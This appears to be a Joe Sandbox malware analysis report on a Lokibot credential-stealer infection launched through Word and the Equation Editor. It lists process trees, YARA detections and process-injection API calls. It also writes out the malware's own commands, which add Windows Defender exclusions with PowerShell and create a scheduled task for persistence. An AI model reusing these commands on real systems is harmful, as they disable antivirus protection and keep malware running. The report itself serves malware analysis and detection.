2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 04 70 1e 16 17 16 16 16 72 68 9d 04 70 20 00 01 00 00 14 73 c8 00 00 0a a2 6f c7 00 00 0a 00 02 7b 2a 00 00 04 02 7b 29 00 00 04 6f ca 00 00 0a 00 02 7b 2a 00 00 04 02 7b 26 00 00 04 6f cc 00 00 0a 00 02 7b 2a 00 00 04 6f cd 00 00 0a 17 8d 92 00 00 01 25 16 72 45 a3 04 70 72 15 00 00 70 19 8d 93 00 00 01 25 16 72 4a 9d 04 70 72 4a 9d 04 70 73 ce 00 00 0a a2 25 17 72 bc 9d 04 70 72 bc 9d 04 70 73 ce 00 00 0a a2 25 18 72 68 9d 04 70 72 68 9d 04 70 73 ce 00 00 0a a2 73 cf 00 00 0a a2 6f d0 00 00 0a 00 02 7b 2a 00 00 04 02 7b 28 00 00 04 6f d1 00 00 0a 00 02 7b 27 00 00 04 72 49 a0 04 70 6f c2 00 00 0a 00 02 7b 27 00 00 04 16 6f c3 00 00 0a 00 02 7b 2b 00 00 04 72 25 00 00 70 6f 30 00 00 0a 00 02 7b 2b 00 00 04 17 6f 3f 00 00 0a 00 02 22 00 00 00 41 22 00 00 Data Ascii: prhp so{{)o{{&o{o%rEprp%rJprJps%rprps%rhprhpsso{{(o{'rIpo{'o{+r%po0{+o?"A"

Target ID:	0
Start time:	14:17:21
Start date:	23/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f6c0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:17:22
Start date:	23/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:17:26
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\sharon38892.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sharon38892.exe"
Imagebase:	0x860000
File size:	771'592 bytes
MD5 hash:	0B67ADEB422396C047E87FA78A9E8E80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:17:29
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
Imagebase:	0xdd0000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:17:29
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Imagebase:	0xdd0000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:17:29
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
Imagebase:	0xc90000
File size:	179'712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:17:31
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\sharon38892.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sharon38892.exe"
Imagebase:	0x860000
File size:	771'592 bytes
MD5 hash:	0B67ADEB422396C047E87FA78A9E8E80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:17:32
Start date:	23/05/2024
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff6a0000
File size:	464'384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	14:17:33
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Imagebase:	0x180000
File size:	771'592 bytes
MD5 hash:	0B67ADEB422396C047E87FA78A9E8E80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:17:37
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Imagebase:	0x180000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Analysis Process: powershell.exePID: 3584, Parent PID: 3472

General

Target ID:	17
Start time:	14:17:37
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Imagebase:	0x180000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Analysis Process: schtasks.exePID: 3700, Parent PID: 3472

General

Target ID:	19
Start time:	14:17:38
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Imagebase:	0xd40000
File size:	179'712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:17:39
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Imagebase:	0x180000
File size:	771'592 bytes
MD5 hash:	0B67ADEB422396C047E87FA78A9E8E80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:17:45
Start date:	23/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	112
Total number of Limit Nodes:	10

Executed Functions

Function 00251A10 Relevance: 5.4, Strings: 4, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 00251D26
$p, xrefs: 00252002
$p, xrefs: 00251FEC
z-,, xrefs: 00251C94

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: $p$$p$5$z-,
API String ID: 0-3342674042
Opcode ID: 2814507994d0705c68f2ec62b2cc32ed2765642cdd7b03c3ae31c6db6d57118c
Instruction ID: 2a2065a681aedd68612f10565abc27e6abf42a84491c7a4aa89fe53b5d857687
Opcode Fuzzy Hash: 2814507994d0705c68f2ec62b2cc32ed2765642cdd7b03c3ae31c6db6d57118c
Instruction Fuzzy Hash: A6125974E11218CFDB18CFA9D944B9DBBB2FF89301F2090AAD80AB7254DB749955CF18

Function 00251E8B Relevance: 3.9, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$p, xrefs: 00251FEC
$p, xrefs: 00251F29
$p, xrefs: 00251F13

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: $p$$p$$p
API String ID: 0-4193490398
Opcode ID: 6c215fe72baa617897778ee596cdc959df3b286cc0827438822d530ab585f1b0
Instruction ID: 5e1d38eedd8ecda6ba3862fce9d32553d7f1a740010b763363a0800753ece2aa
Opcode Fuzzy Hash: 6c215fe72baa617897778ee596cdc959df3b286cc0827438822d530ab585f1b0
Instruction Fuzzy Hash: D181D274E11228CFDB64DFA8D954B9DBBB2FB88301F2081AAD809A7354DB745E91CF14

Function 00255808 Relevance: 2.8, Strings: 2, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UJ, xrefs: 00255AAA
yO6, xrefs: 002558F9

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: UJ$yO6
API String ID: 0-870398751
Opcode ID: 798fb5e7553742734ed5702ad8b89547acc13de183362c1731fda8aeb2b4381b
Instruction ID: 69f792c12391894856be6ffadb8354243497bcbba303b77643426924a09ed481
Opcode Fuzzy Hash: 798fb5e7553742734ed5702ad8b89547acc13de183362c1731fda8aeb2b4381b
Instruction Fuzzy Hash: 82B15770D25629DFCB18CFA6D99459EFBF2FF89300F20942AD816AB224D7349946CF44

Function 00255348 Relevance: 2.7, Strings: 2, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!>c8, xrefs: 00255515
%)Y, xrefs: 00255572

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: !>c8$%)Y
API String ID: 0-2922296349
Opcode ID: f303d2d6d8358464e9fcc43cca907eb2b45dbb2533db1800f70687bffda3defe
Instruction ID: db2917f6dd76366fa6adbd29085e053460f3a8f8ead83e944cc01964219f4744
Opcode Fuzzy Hash: f303d2d6d8358464e9fcc43cca907eb2b45dbb2533db1800f70687bffda3defe
Instruction Fuzzy Hash: 2A815A70D24619EFCF08CFA6E59099EFBB2FF89341F20942AE419AB224E7709545CF44

Function 00255344 Relevance: 2.7, Strings: 2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!>c8, xrefs: 00255515
%)Y, xrefs: 00255572

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: !>c8$%)Y
API String ID: 0-2922296349
Opcode ID: fd7ce6ad32a2a6946cb52e31778ebee71f883d5daeef10ea1fa377afeeb3b8ff
Instruction ID: 3d6bd6adad31dde9d7de38a1694de82774fe0501bdb1d404fc3c5d071d2e917f
Opcode Fuzzy Hash: fd7ce6ad32a2a6946cb52e31778ebee71f883d5daeef10ea1fa377afeeb3b8ff
Instruction Fuzzy Hash: 00814970D24619EFCF08CFA6E58099EFBB2FF89341F20942AE419AB224E7709555CF44

Function 00250D78 Relevance: 1.7, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00250D84

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 862c8f17e48b5017b6fb0b38ae26d96224cd949fe66913c6940e10003c79f5d4
Instruction ID: 66ab12278421d44084f0a04fc8de0ee77dfa8bbb719755934bc85b58136700f0
Opcode Fuzzy Hash: 862c8f17e48b5017b6fb0b38ae26d96224cd949fe66913c6940e10003c79f5d4
Instruction Fuzzy Hash: B7120834A10318CFDB14EFA4C894A9DBBB2FF8A300F1585A9D409AB365DB30AD95CF54

Function 00251E18 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

$p, xrefs: 00251FEC

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: $p
API String ID: 0-982128392
Opcode ID: 5f65818e030caf445f35c1be3475912dca84cbed6e891e7203c631c387af964a
Instruction ID: 335bed74890cbf99fd83b03fa3a8e613b105b0f64f8e305c16f82741c86f51eb
Opcode Fuzzy Hash: 5f65818e030caf445f35c1be3475912dca84cbed6e891e7203c631c387af964a
Instruction Fuzzy Hash: E3713774E10218CFEB14CFA8D945B9DBBB2FB88301F2081AAD809A7354DB709E95CF14

Function 00251E03 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

$p, xrefs: 00251FEC

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID: $p
API String ID: 0-982128392
Opcode ID: 8ff469f35082810ffe5f1e30ab7ba8543115a816da5829725d34eeae8f614f05
Instruction ID: 8662b39033916d70d738e6bb9d55468cfff26c2b3e5273f13ec7905941c4298c
Opcode Fuzzy Hash: 8ff469f35082810ffe5f1e30ab7ba8543115a816da5829725d34eeae8f614f05
Instruction Fuzzy Hash: 93714874E10218CFEB54DFA8D945B9DBBB2FB88301F2085AAD809A7354DB709E95CF14

Function 002504B4 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc7dc5edddd285d369ce32283cc487588905bb04a85169923d1237aa1837636
Instruction ID: 4a2826faa30636b45beb68bc6221f6780f7d4363d14bdd7963edac01290567db
Opcode Fuzzy Hash: bdc7dc5edddd285d369ce32283cc487588905bb04a85169923d1237aa1837636
Instruction Fuzzy Hash: F202F734A10319CFDB14EFA4C890A9DBBB2FF8A300F1585A9E4096B365DB30AD95CF54

Function 00259879 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a9561353ea7c297b884e36de18f8a8515d89280c854e776bb1fddda860d4b5
Instruction ID: dc410d2681241a27b78c62e63050062f0cdc021e1de118e1f0c4ecd0f420a897
Opcode Fuzzy Hash: 96a9561353ea7c297b884e36de18f8a8515d89280c854e776bb1fddda860d4b5
Instruction Fuzzy Hash: 88314B70D15258CFEB08CFA6C8457EEBBF6BF89301F14C06AC809A6254DB740989CF95

Function 046F1B78 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7b8a313d0c12b9da4eb520d441a1ba800b61698bed31685146d446c251d3ad
Instruction ID: 0608fa4c2e9c20baa7f50f96a9d51984074261f4d0f974659b701bcf5c76a125
Opcode Fuzzy Hash: 2b7b8a313d0c12b9da4eb520d441a1ba800b61698bed31685146d446c251d3ad
Instruction Fuzzy Hash: 65A00251E9E008C091405C541A510F7C57C221B2C5F95319096BA370973412F45B2C5D

Function 0025E5DD Relevance: 1.8, APIs: 1, Instructions: 328
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025E8AF

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c9004fa869107454195da842b7f9070c4afefaa5d261076df3e2b86b2b8b695
Instruction ID: 1702203971829822864a58d11a0ef4ec665debfb85915f7faa9e0b50282dac7e
Opcode Fuzzy Hash: 1c9004fa869107454195da842b7f9070c4afefaa5d261076df3e2b86b2b8b695
Instruction Fuzzy Hash: 56C13970D102298FDF25CFA8C841BEDBBB1BF09300F0095A9D859B7294DB749A99CF95

Function 0025E5E8 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025E8AF

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 560bd340387d11936c7267222ffe3087390103e8da84cac733c7458bf6502e60
Instruction ID: 7482b224c5504a89d5ecfe59f206edf21ab323a0d1c97043dfc00b96dca4be84
Opcode Fuzzy Hash: 560bd340387d11936c7267222ffe3087390103e8da84cac733c7458bf6502e60
Instruction Fuzzy Hash: B1C12970D102298FDF24CFA8C845BEDBBB1BF09300F0095A9D819B7294DB749A99CF95

Function 0025E250 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E323

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a2d22455d343706a3a20ee87da35f62e03357569d5aea518f5ebd26034cb275e
Instruction ID: a999af5b756cff206ca569fa94bc1b35a51903432ad15d5e7f00ea7937923ca5
Opcode Fuzzy Hash: a2d22455d343706a3a20ee87da35f62e03357569d5aea518f5ebd26034cb275e
Instruction Fuzzy Hash: B841B9B4D012489FCF00CFA9D984AEEFBF1BB49314F20942AE814B7210C774AA55CF64

Function 0025E3B0 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E462

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0b07acfb0b7090d9d75755a8abf3ca0affb1888fabae187e74afc8e55e3cd805
Instruction ID: bdd1cba4ec3a8c1bafa6e496833448307f4fa3193b5873841bba05d72bcc72ed
Opcode Fuzzy Hash: 0b07acfb0b7090d9d75755a8abf3ca0affb1888fabae187e74afc8e55e3cd805
Instruction Fuzzy Hash: 7B41BAB4D002589FCF10CFA9D884AEEFBB1BF49310F10942AE814B7200C774AA55CF68

Function 0025E128 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025E1D2

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5c0213882e6ebda522590b74f8fcc349f2c9d2ba5b7ef1a6f0213bad401f24ae
Instruction ID: c275c03d2fa5b048a7b558d60e9cd03f3756d91e2a9d0bd4907b7655d7d399ca
Opcode Fuzzy Hash: 5c0213882e6ebda522590b74f8fcc349f2c9d2ba5b7ef1a6f0213bad401f24ae
Instruction Fuzzy Hash: CB41A9B4D002589BCF14CFA9D980AAEFBB1AB49310F10942AE814B7214D775A915CF65

Function 0025DBC0 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025DC6F

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

